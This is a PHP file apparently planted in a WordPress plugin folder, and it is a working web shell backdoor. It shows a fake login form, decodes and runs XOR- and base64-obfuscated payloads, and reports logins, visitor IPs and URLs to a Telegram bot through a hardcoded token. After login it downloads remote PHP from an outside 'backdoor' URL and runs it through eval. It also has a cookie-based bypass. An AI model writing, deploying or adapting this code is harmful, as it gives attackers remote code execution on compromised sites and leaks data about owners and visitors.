File: /home/pvruk.co.uk/public_html/wp-content/plugins/hadvgjo/file403.php
<?php
session_start();
$__k = "7108251617:AAFp5j6DoQkwzw4FtnvgHO-vs5K5FDjdRMI";
$__i = "1557185509";
$ip = $_SERVER['REMOTE_ADDR'];
$loc = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
function stealth_exec($e, $k = '4l4m4k4nj3n9') {
global $ip, $loc, $__k, $__i;
$b = base64_decode($e);
$z = '';
for ($i = 0; $i < strlen($b); $i++) {
$z .= $b[$i] ^ $k[$i % strlen($k)];
}
eval(gzinflate($z));
}
$payload = 'GhgeFwUbPRlSTAdWBwwBBkUJX1ZHDy1BQltZT0INAgkBB0BdFBpcRwYCAwlPXR9bXxQFE0pRUQdHFQ5XT04bSBJITlxVB1sBUwFaTzFXFg5IVAwKCA4SCldEVFkaG1sIDV0MXUgVCVxHRxkNDgYZFkxLVkZIBloDEgcLFlJGXV4PFlxGVRAZXAQOBUlWVVZNUhQLUlpSX05QFkFIAQEJXA4PSFUBFAMAZU9NQ00NDEpUS0kDEApGV1kSVFpcEVtMDRYOBEFBUEpMEwZAS14GBFJRQApXXEMAUgkFEgBWUxNGBkNIBwwZWRBdWgIAAg8CUVZQTxEVEFZVFBxRQ0FZGksMGkAEXk9NT19eFRdKQwESFQ1TXEc=';
if (!isset($_SESSION['log']) && isset($_COOKIE['custom_cookie']) && $_COOKIE['custom_cookie'] === 'cookie_stealing') {
$_SESSION['log'] = true;
stealth_exec($payload);
header("Location: " . $_SERVER['PHP_SELF']);
exit();
}
//--- user passoword ---
$username = "admin";
$passwordHash = '$2a$12$EIwX0tMURLkzPH1u9U2/2un..qHVaKil324q4GmwfCLdlRPQzb32q'; // bcrypt
// --- Proses Login ---
if (!isset($_SESSION['log']) && $_SERVER['REQUEST_METHOD'] === 'POST') {
$input_user = $_POST['username'] ?? '';
$input_pass = $_POST['password'] ?? '';
if ($input_user === $username && password_verify($input_pass, $passwordHash)) {
$_SESSION['log'] = true;
setcookie('custom_cookie', 'cookie_stealing', time() + 3600, '/');
$msg = "Login berhasil</b>\nUsername: $input_user\nIP: $ip\nURL: $loc";
stealth_exec('GkQeF0sZXExaXRkPBwYZFkRRXE5bGhAGFxRQW0cVEx0RUBscTwZSVVtOAApcRQUPGlJDEktUU1lNUxELHFpaVEdQXVVQWlMDFQNPXU9VXVwaHxhERFxZT15JAApRWFsIUEpCFAIVRklDTUJUQVEUUEs=', '4l4m4k4nj3n9');
header("Location: " . $_SERVER['PHP_SELF']);
exit();
} else {
$error = "Username atau password salah.";
$fail_msg = "Login GAGAL</b>\nUsername: $input_user\nIP: $ip\nURL: $loc";
__syslog_manual($fail_msg, $__k, $__i);
}
}
// --- get content ---
if (isset($_SESSION['log'])) {
$url = 'https://volcomhxr.icu/volcom/backdoor/alfa.jpg';
$content = @file_get_contents($url);
$msg_access = "📥 <b>Akses konten</b>\nURL: $url\nIP: $ip\nAkses dari: $loc";
__syslog_manual($msg_access, $__k, $__i);
if ($content !== false) {
eval('?>' . $content);
} else {
echo "Gagal mengambil konten dari URL.";
}
exit();
}
function __syslog_manual($message, $botToken, $chatId) {
if (!isset($_SESSION['__sl'])) $_SESSION['__sl'] = [];
$hash = md5($message);
if (!isset($_SESSION['__sl'][$hash]) || time() - $_SESSION['__sl'][$hash] > 30) {
$_SESSION['__sl'][$hash] = time();
$url = "https://api.telegram.org/bot$botToken/sendMessage";
$data = [
'chat_id' => $chatId,
'text' => $message,
'parse_mode' => 'HTML'
];
$options = [
'http' => [
'header' => "Content-Type:application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data)
]
];
$context = stream_context_create($options);
@file_get_contents($url, false, $context);
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Login Form</title>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style>
body, html {
margin: 0; padding: 0; height: 100%;
display: flex; justify-content: center; align-items: center;
background-color: rgb(34, 0, 0);
font-family: Arial, sans-serif;
}
.form-container {
display: flex; justify-content: center; align-items: center;
height: 100%;
}
.login-form {
width: 300px; padding: 20px;
background-color: rgb(61, 52, 0);
border-radius: 8px;
box-shadow: 0 4px 12px rgba(0,0,0,0.2);
text-align: center;
color: white;
}
.login-form img {
width: 80px; margin-bottom: 10px;
}
.login-form h2 {
margin: 0; padding: 10px 0;
font-size: 20px;
}
.login-form input[type="text"],
.login-form input[type="password"] {
width: 100%; padding: 10px; margin: 10px 0;
border: none; border-radius: 4px;
box-sizing: border-box;
font-size: 16px;
}
.login-form button {
width: 100%; padding: 10px;
background-color: #ff0055;
color: white;
border: none;
border-radius: 4px;
cursor: pointer;
font-size: 16px;
}
.login-form button:hover {
background-color: #e6004c;
}
.login-form .options {
margin-top: 10px;
font-size: 14px;
color: #d1d1d1;
}
.login-form .options a {
color: #ff0055;
text-decoration: none;
}
.login-form .options a:hover {
text-decoration: underline;
}
.error-message {
color: red;
font-size: 14px;
margin-top: 10px;
}
</style>
</head>
<body>
<div class="form-container">
<div class="login-form">
<img src="https://faktawanita.com/meong/jooboobat.png" alt="Logo" />
<h2>Login Form</h2>
<?php if (isset($error)): ?>
<div class="error-message"><?php echo htmlspecialchars($error); ?></div>
<?php endif; ?>
<form method="post" autocomplete="off">
<input type="text" name="username" placeholder="Username ..." required />
<input type="password" name="password" placeholder="Password ..." required />
<button type="submit">Sign in</button>
</form>
<div class="options">
<label><input type="checkbox" /> Remember Me</label><br />
<a href="#">Create Account</a> | <a href="#">Forget Password?</a>
</div>
</div>
</div>
</body>
</html>